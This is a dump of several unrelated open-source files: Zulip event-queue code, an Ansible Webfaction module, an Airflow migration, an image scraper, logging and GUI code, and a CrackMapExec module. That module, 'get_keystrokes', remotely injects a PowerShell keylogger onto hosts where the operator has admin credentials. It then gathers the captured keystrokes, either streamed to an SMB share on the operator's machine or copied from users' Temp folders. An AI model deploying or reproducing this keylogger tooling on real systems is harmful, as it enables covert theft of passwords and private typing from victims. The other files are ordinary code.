self.current_handler = handler
handler.client_descriptor = self
self.last_connection_time = time.time()
def timeout_callback():
self._timeout_handle = None
# All clients get heartbeat events
self.add_event(dict(type='heartbeat'))
ioloop = tornado.ioloop.IOLoop.instance()
heartbeat_time = time.time() + HEARTBEAT_MIN_FREQ_SECS + random.randint(0, 10)
if self.client_type.name != 'API: heartbeat test':
self._timeout_handle = ioloop.add_timeout(heartbeat_time, timeout_callback)
def disconnect_handler(self, client_closed=False):
if self.current_handler:
self.current_handler.client_descriptor = None
if client_closed:
request = self.current_handler._request
logging.info("Client disconnected for queue %s (%s via %s)" % \
(self.event_queue.id, request._email, request.client.name))
self.current_handler = None
if self._timeout_handle is not None:
ioloop = tornado.ioloop.IOLoop.instance()
ioloop.remove_timeout(self._timeout_handle)
self._timeout_handle = None
def cleanup(self):
do_gc_event_queues([self.event_queue.id], [self.user_profile_id],
[self.realm_id])
def compute_full_event_type(event):
if event["type"] == "update_message_flags":
if event["all"]:
# Put the "all" case in its own category
return "all_flags/%s/%s" % (event["flag"], event["operation"])
return "flags/%s/%s" % (event["operation"], event["flag"])
return event["type"]
class EventQueue(object):
def __init__(self, id):
self.queue = deque()
self.next_event_id = 0
self.id = id
self.virtual_events = {}
def to_dict(self):
# If you add a new key to this dict, make sure you add appropriate
# migration code in from_dict or load_event_queues to account for
# loading event queues that lack that key.
return dict(id=self.id,
next_event_id=self.next_event_id,
queue=list(self.queue),
virtual_events=self.virtual_events)
@classmethod
def from_dict(cls, d):
ret = cls(d['id'])
ret.next_event_id = d['next_event_id']
ret.queue = deque(d['queue'])
ret.virtual_events = d.get("virtual_events", {})
return ret
def push(self, event):
event['id'] = self.next_event_id
self.next_event_id += 1
full_event_type = compute_full_event_type(event)
if (full_event_type in ["pointer", "restart"] or
full_event_type.startswith("flags/")):
if full_event_type not in self.virtual_events:
self.virtual_events[full_event_type] = copy.deepcopy(event)
return
# Update the virtual event with the values from the event
virtual_event = self.virtual_events[full_event_type]
virtual_event["id"] = event["id"]
if "timestamp" in event:
virtual_event["timestamp"] = event["timestamp"]
if full_event_type == "pointer":
virtual_event["pointer"] = event["pointer"]
elif full_event_type == "restart":
virtual_event["server_generation"] = event["server_generation"]
elif full_event_type.startswith("flags/"):
virtual_event["messages"] += event["messages"]
else:
self.queue.append(event)
# Note that pop ignores virtual events. This is fine in our
# current usage since virtual events should always be resolved to
# a real event before being given to users.
def pop(self):
return self.queue.popleft()
def empty(self):
return len(self.queue) == 0 and len(self.virtual_events) == 0
# See the comment on pop; that applies here as well
def prune(self, through_id):
while len(self.queue) != 0 and self.queue[0]['id'] <= through_id:
self.pop()
def contents(self):
contents = []
virtual_id_map = {}
for event_type in self.virtual_events:
virtual_id_map[self.virtual_events[event_type]["id"]] = self.virtual_events[event_type]
virtual_ids = sorted(list(virtual_id_map.keys()))
# Merge the virtual events into their final place in the queue
index = 0
length = len(virtual_ids)
for event in self.queue:
while index < length and virtual_ids[index] < event["id"]:
contents.append(virtual_id_map[virtual_ids[index]])
index += 1
contents.append(event)
while index < length:
contents.append(virtual_id_map[virtual_ids[index]])
index += 1
self.virtual_events = {}
self.queue = deque(contents)
return contents
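# A minimal sketch of virtual-event coalescing, using made-up events: two
# pointer events collapse into a single virtual event, which contents()
# merges back into id order alongside regular events:
#
#     q = EventQueue('0:0')
#     q.push(dict(type='pointer', pointer=5))    # becomes a virtual event
#     q.push(dict(type='pointer', pointer=9))    # updates it in place
#     q.push(dict(type='message', message='m'))  # queued normally
#     q.contents()
#     # -> [{'type': 'pointer', 'pointer': 9, 'id': 1},
#     #     {'type': 'message', 'message': 'm', 'id': 2}]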
# maps queue ids to client descriptors
clients = {}
# maps user id to list of client descriptors
user_clients = {}
# maps realm id to list of client descriptors with all_public_streams=True
realm_clients_all_streams = {}
# list of registered gc hooks.
# each one will be called with a user profile id, queue, and bool
# last_for_client that is true if this is the last queue pertaining
# to this user_profile_id that is about to be deleted
gc_hooks = []
next_queue_id = 0
def add_client_gc_hook(hook):
gc_hooks.append(hook)
def get_client_descriptor(queue_id):
return clients.get(queue_id)
def get_client_descriptors_for_user(user_profile_id):
return user_clients.get(user_profile_id, [])
def get_client_descriptors_for_realm_all_streams(realm_id):
return realm_clients_all_streams.get(realm_id, [])
def add_to_client_dicts(client):
user_clients.setdefault(client.user_profile_id, []).append(client)
if client.all_public_streams or client.narrow != []:
realm_clients_all_streams.setdefault(client.realm_id, []).append(client)
def allocate_client_descriptor(user_profile_id, realm_id, event_types, client_type,
apply_markdown, all_public_streams, lifespan_secs,
narrow=[]):
global next_queue_id
id = str(settings.SERVER_GENERATION) + ':' + str(next_queue_id)
next_queue_id += 1
client = ClientDescriptor(user_profile_id, realm_id, EventQueue(id), event_types, client_type,
apply_markdown, all_public_streams, lifespan_secs, narrow)
clients[id] = client
add_to_client_dicts(client)
return client
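# A minimal allocation sketch (the user_profile below is hypothetical).
# Queue ids embed the server generation plus a per-process counter:
#
#     client = allocate_client_descriptor(
#         user_profile.id, user_profile.realm_id, event_types=None,
#         client_type=get_client('website'), apply_markdown=True,
#         all_public_streams=False, lifespan_secs=0)
#     client.event_queue.id  # e.g. '1400000000:0'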
def do_gc_event_queues(to_remove, affected_users, affected_realms):
def filter_client_dict(client_dict, key):
if key not in client_dict:
return
new_client_list = filter(lambda c: c.event_queue.id not in to_remove,
client_dict[key])
if len(new_client_list) == 0:
del client_dict[key]
else:
client_dict[key] = new_client_list
for user_id in affected_users:
filter_client_dict(user_clients, user_id)
for realm_id in affected_realms:
filter_client_dict(realm_clients_all_streams, realm_id)
for id in to_remove:
for cb in gc_hooks:
cb(clients[id].user_profile_id, clients[id], clients[id].user_profile_id not in user_clients)
del clients[id]
def gc_event_queues():
start = time.time()
to_remove = set()
affected_users = set()
affected_realms = set()
for (id, client) in clients.iteritems():
if client.idle(start):
to_remove.add(id)
affected_users.add(client.user_profile_id)
affected_realms.add(client.realm_id)
do_gc_event_queues(to_remove, affected_users, affected_realms)
logging.info(('Tornado removed %d idle event queues owned by %d users in %.3fs.'
+ ' Now %d active queues')
% (len(to_remove), len(affected_users), time.time() - start,
len(clients)))
statsd.gauge('tornado.active_queues', len(clients))
statsd.gauge('tornado.active_users', len(user_clients))
def dump_event_queues():
start = time.time()
with file(settings.JSON_PERSISTENT_QUEUE_FILENAME, "w") as stored_queues:
ujson.dump([(qid, client.to_dict()) for (qid, client) in clients.iteritems()],
stored_queues)
logging.info('Tornado dumped %d event queues in %.3fs'
% (len(clients), time.time() - start))
def load_event_queues():
global clients
start = time.time()
if os.path.exists(settings.PERSISTENT_QUEUE_FILENAME):
try:
with file(settings.PERSISTENT_QUEUE_FILENAME, "r") as stored_queues:
clients = pickle.load(stored_queues)
except (IOError, EOFError):
pass
else:
# ujson chokes on bad input pretty easily. We separate out the actual
# file reading from the loading so that we don't silently fail if we get
# bad input.
try:
with file(settings.JSON_PERSISTENT_QUEUE_FILENAME, "r") as stored_queues:
json_data = stored_queues.read()
try:
clients = dict((qid, ClientDescriptor.from_dict(client))
for (qid, client) in ujson.loads(json_data))
except Exception:
logging.exception("Could not deserialize event queues")
except (IOError, EOFError):
pass
for client in clients.itervalues():
# Put code for migrations due to event queue data format changes here
add_to_client_dicts(client)
logging.info('Tornado loaded %d event queues in %.3fs'
% (len(clients), time.time() - start))
def send_restart_events():
event = dict(type='restart', server_generation=settings.SERVER_GENERATION)
for client in clients.itervalues():
if client.accepts_event(event):
client.add_event(event.copy())
def setup_event_queue():
load_event_queues()
atexit.register(dump_event_queues)
# Make sure we dump event queues even if we exit via signal
signal.signal(signal.SIGTERM, lambda signum, stack: sys.exit(1))
try:
os.rename(settings.PERSISTENT_QUEUE_FILENAME, "/var/tmp/event_queues.pickle.last")
except OSError:
pass
try:
os.rename(settings.JSON_PERSISTENT_QUEUE_FILENAME, "/var/tmp/event_queues.json.last")
except OSError:
pass
# Set up event queue garbage collection
ioloop = tornado.ioloop.IOLoop.instance()
pc = tornado.ioloop.PeriodicCallback(gc_event_queues,
EVENT_QUEUE_GC_FREQ_MSECS, ioloop)
pc.start()
send_restart_events()
# The following functions are called from Django
# Workaround to support the Python-requests 1.0 transition of .json
# from a property to a function
requests_json_is_function = callable(requests.Response.json)
def extract_json_response(resp):
if requests_json_is_function:
return resp.json()
else:
return resp.json
def request_event_queue(user_profile, user_client, apply_markdown,
queue_lifespan_secs, event_types=None, all_public_streams=False,
narrow=[]):
if settings.TORNADO_SERVER:
req = {'dont_block' : 'true',
'apply_markdown': ujson.dumps(apply_markdown),
'all_public_streams': ujson.dumps(all_public_streams),
'client' : 'internal',
'user_client' : user_client.name,
'narrow' : ujson.dumps(narrow),
'lifespan_secs' : queue_lifespan_secs}
if event_types is not None:
req['event_types'] = ujson.dumps(event_types)
resp = requests.get(settings.TORNADO_SERVER + '/api/v1/events',
auth=requests.auth.HTTPBasicAuth(user_profile.email,
user_profile.api_key),
params=req)
resp.raise_for_status()
return extract_json_response(resp)['queue_id']
return None
def get_user_events(user_profile, queue_id, last_event_id):
if settings.TORNADO_SERVER:
resp = requests.get(settings.TORNADO_SERVER + '/api/v1/events',
auth=requests.auth.HTTPBasicAuth(user_profile.email,
user_profile.api_key),
params={'queue_id' : queue_id,
'last_event_id': last_event_id,
'dont_block' : 'true',
'client' : 'internal'})
resp.raise_for_status()
return extract_json_response(resp)['events']
# Send email notifications to users after they have been idle for 1 hour
NOTIFY_AFTER_IDLE_HOURS = 1
def build_offline_notification(user_profile_id, message_id):
return {"user_profile_id": user_profile_id,
"message_id": message_id,
"timestamp": time.time()}
def missedmessage_hook(user_profile_id, queue, last_for_client):
# Only process missedmessage hook when the last queue for a
# client has been garbage collected
if not last_for_client:
return
message_ids_to_notify = []
for event in queue.event_queue.contents():
        if event['type'] != 'message' or not event['flags']:
            continue
        if 'mentioned' in event['flags'] and 'read' not in event['flags']:
notify_info = dict(message_id=event['message']['id'])
if not event.get('push_notified', False):
notify_info['send_push'] = True
if not event.get('email_notified', False):
notify_info['send_email'] = True
message_ids_to_notify.append(notify_info)
for notify_info in message_ids_to_notify:
msg_id = notify_info['message_id']
notice = build_offline_notification(user_profile_id, msg_id)
if notify_info.get('send_push', False):
queue_json_publish("missedmessage_mobile_notifications", notice, lambda notice: None)
if notify_info.get('send_email', False):
queue_json_publish("missedmessage_emails", notice, lambda notice: None)
@cache_with_key(message_cache_key, timeout=3600*24)
def get_message_by_id_dbwarn(message_id):
if not settings.TEST_SUITE:
logging.warning("Tornado failed to load message from memcached when delivering!")
return Message.objects.select_related().get(id=message_id)
def receiver_is_idle(user_profile_id, realm_presences):
# If a user has no message-receiving event queues, they've got no open zulip
# session so we notify them
all_client_descriptors = get_client_descriptors_for_user(user_profile_id)
message_event_queues = [client for client in all_client_descriptors if client.accepts_messages()]
off_zulip = len(message_event_queues) == 0
# It's possible a recipient is not in the realm of a sender. We don't have
# presence information in this case (and it's hard to get without an additional
# db query) so we simply don't try to guess if this cross-realm recipient
# has been idle for too long
    if realm_presences is None or user_profile_id not in realm_presences:
return off_zulip
# We want to find the newest "active" presence entity and compare that to the
# activity expiry threshold.
user_presence = realm_presences[user_profile_id]
latest_active_timestamp = None
idle = False
for client, status in user_presence.iteritems():
if (latest_active_timestamp is None or status['timestamp'] > latest_active_timestamp) and \
status['status'] == 'active':
latest_active_timestamp = status['timestamp']
if latest_active_timestamp is None:
idle = True
else:
active_datetime = timestamp_to_datetime(latest_active_timestamp)
# 140 seconds is consistent with activity.js:OFFLINE_THRESHOLD_SECS
idle = now() - active_datetime > datetime.timedelta(seconds=140)
return off_zulip or idle
def process_message_event(event_template, users):
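    # Fan one message event out to every connected client that should receive
    # it, tracking per-user notification state (push and email) along the way.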
realm_presences = {int(k): v for k, v in event_template['presences'].items()}
sender_queue_id = event_template.get('sender_queue_id', None)
if "message_dict_markdown" in event_template:
message_dict_markdown = event_template['message_dict_markdown']
message_dict_no_markdown = event_template['message_dict_no_markdown']
else:
# We can delete this and get_message_by_id_dbwarn after the
# next prod deploy
message = get_message_by_id_dbwarn(event_template['message'])
message_dict_markdown = message.to_dict(True)
message_dict_no_markdown = message.to_dict(False)
sender_id = message_dict_markdown['sender_id']
message_id = message_dict_markdown['id']
message_type = message_dict_markdown['type']
sending_client = message_dict_markdown['client']
# To remove duplicate clients: Maps queue ID to {'client': Client, 'flags': flags}
send_to_clients = dict()
# Extra user-specific data to include
extra_user_data = {}
if 'stream_name' in event_template and not event_template.get("invite_only"):
for client in get_client_descriptors_for_realm_all_streams(event_template['realm_id']):
send_to_clients[client.event_queue.id] = {'client': client, 'flags': None}
if sender_queue_id is not None and client.event_queue.id == sender_queue_id:
send_to_clients[client.event_queue.id]['is_sender'] = True
for user_data in users:
user_profile_id = user_data['id']
flags = user_data.get('flags', [])
for client in get_client_descriptors_for_user(user_profile_id):
send_to_clients[client.event_queue.id] = {'client': client, 'flags': flags}
if sender_queue_id is not None and client.event_queue.id == sender_queue_id:
send_to_clients[client.event_queue.id]['is_sender'] = True
        # If the recipient was offline and the message was a private message to
        # them, or they were @-mentioned, we potentially notify them more immediately
received_pm = message_type == "private" and user_profile_id != sender_id
mentioned = 'mentioned' in flags
idle = receiver_is_idle(user_profile_id, realm_presences)
always_push_notify = user_data.get('always_push_notify', False)
if (received_pm or mentioned) and (idle or always_push_notify):
notice = build_offline_notification(user_profile_id, message_id)
queue_json_publish("missedmessage_mobile_notifications", notice, lambda notice: None)
notified = dict(push_notified=True)
# Don't send missed message emails if always_push_notify is True
if idle:
# We require RabbitMQ to do this, as we can't call the email handler
# from the Tornado process. So if there's no rabbitmq support do nothing
queue_json_publish("missedmessage_emails", notice, lambda notice: None)
notified['email_notified'] = True
extra_user_data[user_profile_id] = notified
for client_data in send_to_clients.itervalues():
client = client_data['client']
flags = client_data['flags']
is_sender = client_data.get('is_sender', False)
extra_data = extra_user_data.get(client.user_profile_id, None)
if not client.accepts_messages():
# The actual check is the accepts_event() check below;
# this line is just an optimization to avoid copying
# message data unnecessarily
continue
if client.apply_markdown:
message_dict = message_dict_markdown
else:
message_dict = message_dict_no_markdown
# Make sure Zephyr mirroring bots know whether stream is invite-only
if "mirror" in client.client_type.name and event_template.get("invite_only"):
message_dict = message_dict.copy()
message_dict["invite_only_stream"] = True
user_event = dict(type='message', message=message_dict, flags=flags)
if extra_data is not None:
user_event.update(extra_data)
if is_sender:
local_message_id = event_template.get('local_id', None)
if local_message_id is not None:
user_event["local_message_id"] = local_message_id
if not client.accepts_event(user_event):
continue
# The below prevents (Zephyr) mirroring loops.
if ('mirror' in sending_client and
sending_client.lower() == client.client_type.name.lower()):
continue
client.add_event(user_event)
def process_event(event, users):
for user_profile_id in users:
for client in get_client_descriptors_for_user(user_profile_id):
if client.accepts_event(event):
client.add_event(event.copy())
def process_userdata_event(event_template, users):
for user_data in users:
user_profile_id = user_data['id']
user_event = event_template.copy() # shallow, but deep enough for our needs
for key in user_data.keys():
if key != "id":
user_event[key] = user_data[key]
for client in get_client_descriptors_for_user(user_profile_id):
if client.accepts_event(user_event):
client.add_event(user_event)
def process_notification(notice):
event = notice['event']
users = notice['users']
if event['type'] in ["update_message"]:
process_userdata_event(event, users)
elif event['type'] == "message":
process_message_event(event, users)
else:
process_event(event, users)
# Runs in the Django process to send a notification to Tornado.
#
# We use JSON rather than bare form parameters, so that we can represent
# different types and for compatibility with non-HTTP transports.
def send_notification_http(data):
if settings.TORNADO_SERVER and not settings.RUNNING_INSIDE_TORNADO:
requests.post(settings.TORNADO_SERVER + '/notify_tornado', data=dict(
data = ujson.dumps(data),
secret = settings.SHARED_SECRET))
else:
process_notification(data)
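# Illustrative payload (shape taken from the code above, values hypothetical):
#   POST /notify_tornado with form fields
#     data   = '{"event": {"type": "message", ...}, "users": [42]}'
#     secret = settings.SHARED_SECRET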
def send_notification(data):
return queue_json_publish("notify_tornado", data, send_notification_http)
def send_event(event, users):
return queue_json_publish("notify_tornado",
dict(event=event, users=users),
send_notification_http)
| apache-2.0 | 107,240,590,736,527,000 | 40.432815 | 112 | 0.619807 | false |
frenchfrywpepper/ansible-modules-extras | cloud/webfaction/webfaction_site.py | 62 | 6939 | #!/usr/bin/python
#
# Create Webfaction website using Ansible and the Webfaction API
#
# ------------------------------------------
#
# (c) Quentin Stafford-Fraser 2015
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: webfaction_site
short_description: Add or remove a website on a Webfaction host
description:
- Add or remove a website on a Webfaction host. Further documentation at http://github.com/quentinsf/ansible-webfaction.
author: Quentin Stafford-Fraser (@quentinsf)
version_added: "2.0"
notes:
- Sadly, you I(do) need to know your webfaction hostname for the C(host) parameter. But at least, unlike the API, you don't need to know the IP address - you can use a DNS name.
- If a site of the same name exists in the account but on a different host, the operation will exit.
- "You can run playbooks that use this on a local machine, or on a Webfaction host, or elsewhere, since the scripts use the remote webfaction API - the location is not important. However, running them on multiple hosts I(simultaneously) is best avoided. If you don't specify I(localhost) as your host, you may want to add C(serial: 1) to the plays."
- See `the webfaction API <http://docs.webfaction.com/xmlrpc-api/>`_ for more info.
options:
name:
description:
- The name of the website
required: true
state:
description:
- Whether the website should exist
required: false
choices: ['present', 'absent']
default: "present"
host:
description:
- The webfaction host on which the site should be created.
required: true
https:
description:
- Whether or not to use HTTPS
required: false
choices:
- true
- false
default: 'false'
site_apps:
description:
- A mapping of URLs to apps
required: false
subdomains:
description:
- A list of subdomains associated with this site.
required: false
default: null
login_name:
description:
- The webfaction account to use
required: true
login_password:
description:
- The webfaction password to use
required: true
'''
EXAMPLES = '''
- name: create website
webfaction_site:
name: testsite1
state: present
host: myhost.webfaction.com
subdomains:
- 'testsite1.my_domain.org'
site_apps:
- ['testapp1', '/']
https: no
login_name: "{{webfaction_user}}"
login_password: "{{webfaction_passwd}}"
'''
import socket
import xmlrpclib
webfaction = xmlrpclib.ServerProxy('https://api.webfaction.com/')
def main():
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True),
state = dict(required=False, choices=['present', 'absent'], default='present'),
# You can specify an IP address or hostname.
host = dict(required=True),
https = dict(required=False, type='bool', default=False),
subdomains = dict(required=False, type='list', default=[]),
site_apps = dict(required=False, type='list', default=[]),
login_name = dict(required=True),
login_password = dict(required=True),
),
supports_check_mode=True
)
site_name = module.params['name']
site_state = module.params['state']
site_host = module.params['host']
site_ip = socket.gethostbyname(site_host)
session_id, account = webfaction.login(
module.params['login_name'],
module.params['login_password']
)
site_list = webfaction.list_websites(session_id)
site_map = dict([(i['name'], i) for i in site_list])
existing_site = site_map.get(site_name)
result = {}
# Here's where the real stuff happens
if site_state == 'present':
# Does a site with this name already exist?
if existing_site:
# If yes, but it's on a different IP address, then fail.
# If we wanted to allow relocation, we could add a 'relocate=true' option
# which would get the existing IP address, delete the site there, and create it
# at the new address. A bit dangerous, perhaps, so for now we'll require manual
# deletion if it's on another host.
if existing_site['ip'] != site_ip:
module.fail_json(msg="Website already exists with a different IP address. Please fix by hand.")
# If it's on this host and the key parameters are the same, nothing needs to be done.
if (existing_site['https'] == module.boolean(module.params['https'])) and \
(set(existing_site['subdomains']) == set(module.params['subdomains'])) and \
(dict(existing_site['website_apps']) == dict(module.params['site_apps'])):
module.exit_json(
changed = False
)
positional_args = [
session_id, site_name, site_ip,
module.boolean(module.params['https']),
module.params['subdomains'],
]
for a in module.params['site_apps']:
positional_args.append( (a[0], a[1]) )
if not module.check_mode:
# If this isn't a dry run, create or modify the site
result.update(
webfaction.create_website(
*positional_args
) if not existing_site else webfaction.update_website (
*positional_args
)
)
elif site_state == 'absent':
# If the site's already not there, nothing changed.
if not existing_site:
module.exit_json(
changed = False,
)
if not module.check_mode:
# If this isn't a dry run, delete the site
result.update(
webfaction.delete_website(session_id, site_name, site_ip)
)
else:
module.fail_json(msg="Unknown state specified: {}".format(site_state))
module.exit_json(
changed = True,
result = result
)
from ansible.module_utils.basic import *
main()
| gpl-3.0 | 6,347,011,683,296,304,000 | 32.042857 | 353 | 0.602536 | false |
jgao54/airflow | airflow/migrations/versions/a56c9515abdc_remove_dag_stat_table.py | 6 | 1581 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Remove dag_stat table
Revision ID: a56c9515abdc
Revises: c8ffec048a3b
Create Date: 2018-12-27 10:27:59.715872
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'a56c9515abdc'
down_revision = 'c8ffec048a3b'
branch_labels = None
depends_on = None
def upgrade():
op.drop_table("dag_stats")
def downgrade():
op.create_table('dag_stats',
sa.Column('dag_id', sa.String(length=250), nullable=False),
sa.Column('state', sa.String(length=50), nullable=False),
sa.Column('count', sa.Integer(), nullable=False, default=0),
sa.Column('dirty', sa.Boolean(), nullable=False, default=False),
sa.PrimaryKeyConstraint('dag_id', 'state'))
| apache-2.0 | 4,174,148,292,197,796,000 | 32.638298 | 84 | 0.701455 | false |
shintoo/DailyImage | getimage.py | 1 | 1515 | #!/usr/bin/python
# getimage.py - this file is part of dailyimage
# Retrieve an image from a google image search
import sys # argv
import re # finding images
import requests # downloading results and images
import bs4 # finding images
def get_image(query):
'''
function get_image
generator
arguments:
query: string
yields:
Raw image data retrieved from a google image search of the query
'''
# URL for the image search
url = 'https://www.google.com/search?tbm=isch&q=' + query
# Download the result
res = requests.get(url)
# Check for error code
res.raise_for_status()
# Generate the parser
Soup = bs4.BeautifulSoup(res.text, 'lxml')
# Find each image - in this case, the thumbnail of each result
images = Soup.findAll('img')
for img in images:
# Find all images with 'gstatic.com' in their src
search = re.search('gstatic.com', img['src'])
if search:
# Download the image
raw_image = requests.get(img['src'])
raw_image.raise_for_status()
# yield the raw binary data
yield raw_image.content
def main(argv):
    if len(argv) != 2:
        print('usage: getimage.py query')
        return
    images = get_image(argv[1]) # create the generator
    print('Saving ' + argv[1] + '_image...')
    fp = open(argv[1] + '_image', 'wb')
    fp.write(next(images)) # consume the first image it yields
    fp.close()
if __name__ == '__main__':
main(sys.argv)
| mit | 7,848,023,688,976,881,000 | 26.053571 | 72 | 0.594719 | false |
jorik041/CrackMapExec | cme/modules/get_keystrokes.py | 1 | 4591 | from cme.helpers.powershell import *
from cme.helpers.misc import gen_random_string
from cme.servers.smb import CMESMBServer
from gevent import sleep
from sys import exit
import os
class CMEModule:
'''
Executes PowerSploit's Get-Keystrokes script
Module by @byt3bl33d3r
'''
name = 'get_keystrokes'
description = "Logs keys pressed, time and the active window"
supported_protocols = ['smb', 'mssql']
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
'''
TIMEOUT Specifies the interval in minutes to capture keystrokes.
STREAM Specifies whether to stream the keys over the network (default: False)
POLL Specifies the interval in seconds to poll the log file (default: 20)
'''
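        # Illustrative invocation (target, credentials and CLI syntax are
        # hypothetical examples, not taken from this file):
        #   cme smb 192.168.1.10 -u admin -p Passw0rd -M get_keystrokes -o TIMEOUT=5 STREAM=True POLL=30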
if 'TIMEOUT' not in module_options:
context.log.error('TIMEOUT option is required!')
exit(1)
self.stream = False
self.poll = 20
self.timeout = int(module_options['TIMEOUT'])
if 'STREAM' in module_options:
            # bool('False') is True, so parse the option string explicitly
            self.stream = module_options['STREAM'].lower() == 'true'
if 'POLL' in module_options:
self.poll = int(module_options['POLL'])
context.log.info('This module will not exit until CTRL-C is pressed')
context.log.info('Keystrokes will be stored in ~/.cme/logs\n')
self.ps_script1 = obfs_ps_script('cme_powershell_scripts/Invoke-PSInject.ps1')
self.ps_script2 = obfs_ps_script('powersploit/Exfiltration/Get-Keystrokes.ps1')
if self.stream:
self.share_name = gen_random_string(5).upper()
self.smb_server = CMESMBServer(context.log, self.share_name, context.log_folder_path)
self.smb_server.start()
else:
self.file_name = gen_random_string(5)
def on_admin_login(self, context, connection):
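        # Build the Get-Keystrokes launcher, inject it via PowerShell, then (in
        # non-stream mode) poll each logged-on user's temp dir for the key log.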
keys_folder = 'get_keystrokes_{}'.format(connection.host)
if not self.stream:
command = 'Get-Keystrokes -LogPath "$Env:Temp\\{}" -Timeout {}'.format(self.file_name, self.timeout)
else:
command = 'Get-Keystrokes -LogPath \\\\{}\\{}\\{}\\keys.log -Timeout {}'.format(context.localip, self.share_name, keys_folder, self.timeout)
keys_command = gen_ps_iex_cradle(context, 'Get-Keystrokes.ps1', command, post_back=False)
launcher = gen_ps_inject(keys_command, context)
connection.ps_execute(launcher)
context.log.success('Executed launcher')
if not self.stream:
users = connection.loggedon_users()
keys_folder_path = os.path.join(context.log_folder_path, keys_folder)
try:
while True:
for user in users:
if '$' not in user.wkui1_username and os.path.exists(keys_folder_path):
keys_log = os.path.join(keys_folder_path, 'keys_{}.log'.format(user.wkui1_username))
with open(keys_log, 'a+') as key_file:
file_path = '/Users/{}/AppData/Local/Temp/{}'.format(user.wkui1_username, self.file_name)
try:
connection.conn.getFile('C$', file_path, key_file.write)
context.log.success('Got keys! Stored in {}'.format(keys_log))
except Exception as e:
context.log.debug('Error retrieving key file contents from {}: {}'.format(file_path, e))
sleep(self.poll)
except KeyboardInterrupt:
pass
def on_request(self, context, request):
if 'Invoke-PSInject.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script1)
elif 'Get-Keystrokes.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
# We received the callback, so lets setup the folder to store the keys
keys_folder_path = os.path.join(context.log_folder_path, 'get_keystrokes_{}'.format(request.client_address[0]))
if not os.path.exists(keys_folder_path): os.mkdir(keys_folder_path)
request.wfile.write(self.ps_script2)
request.stop_tracking_host()
else:
request.send_response(404)
request.end_headers()
def on_shutdown(self, context, connection):
if self.stream:
self.smb_server.shutdown()
| bsd-2-clause | 3,567,030,608,053,592,000 | 39.27193 | 152 | 0.587672 | false |
foursquare/commons-old | src/python/twitter/common/log/formatters/plain.py | 16 | 1610 | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import logging
from twitter.common.log.formatters.base import format_message
class PlainFormatter(logging.Formatter):
"""
Format a log in a plainer style:
type] msg
"""
SCHEME = 'plain'
LEVEL_MAP = {
logging.FATAL: 'FATAL',
logging.ERROR: 'ERROR',
logging.WARN: ' WARN',
logging.INFO: ' INFO',
logging.DEBUG: 'DEBUG'
}
def __init__(self):
logging.Formatter.__init__(self)
def format(self, record):
try:
level = PlainFormatter.LEVEL_MAP[record.levelno]
except:
level = '?????'
record_message = '%s] %s' % (level, format_message(record))
record.getMessage = lambda: record_message
return logging.Formatter.format(self, record)
| apache-2.0 | 8,593,446,183,882,732,000 | 34.777778 | 100 | 0.565217 | false |
scootergrisen/virtaal | virtaal/views/langview.py | 6 | 8842 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009-2011 Zuza Software Foundation
#
# This file is part of Virtaal.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
import os
import gobject
import gtk
import gtk.gdk
import logging
from virtaal.common import GObjectWrapper
from virtaal.models.langmodel import LanguageModel
from baseview import BaseView
from widgets.popupmenubutton import PopupMenuButton
class LanguageView(BaseView):
"""
Manages the language selection on the GUI and communicates with its associated
C{LanguageController}.
"""
# INITIALIZERS #
def __init__(self, controller):
self.controller = controller
self._init_gui()
def _create_dialogs(self):
from widgets.langselectdialog import LanguageSelectDialog
from widgets.langadddialog import LanguageAddDialog
langs = [LanguageModel(lc) for lc in LanguageModel.languages]
langs.sort(key=lambda x: x.name)
self.select_dialog = LanguageSelectDialog(langs, parent=self.controller.main_controller.view.main_window)
self.select_dialog.btn_add.connect('clicked', self._on_addlang_clicked)
self.add_dialog = LanguageAddDialog(parent=self.select_dialog.dialog)
def _init_gui(self):
self.menu = None
self.popupbutton = PopupMenuButton()
self.popupbutton.connect('toggled', self._on_button_toggled)
self.controller.main_controller.view.main_window.connect(
'style-set', self._on_style_set
)
if self.controller.recent_pairs:
self.popupbutton.text = self._get_display_string(*self.controller.recent_pairs[0])
def _init_menu(self):
self.menu = gtk.Menu()
self.popupbutton.set_menu(self.menu)
self.recent_items = []
for i in range(self.controller.NUM_RECENT):
item = gtk.MenuItem('')
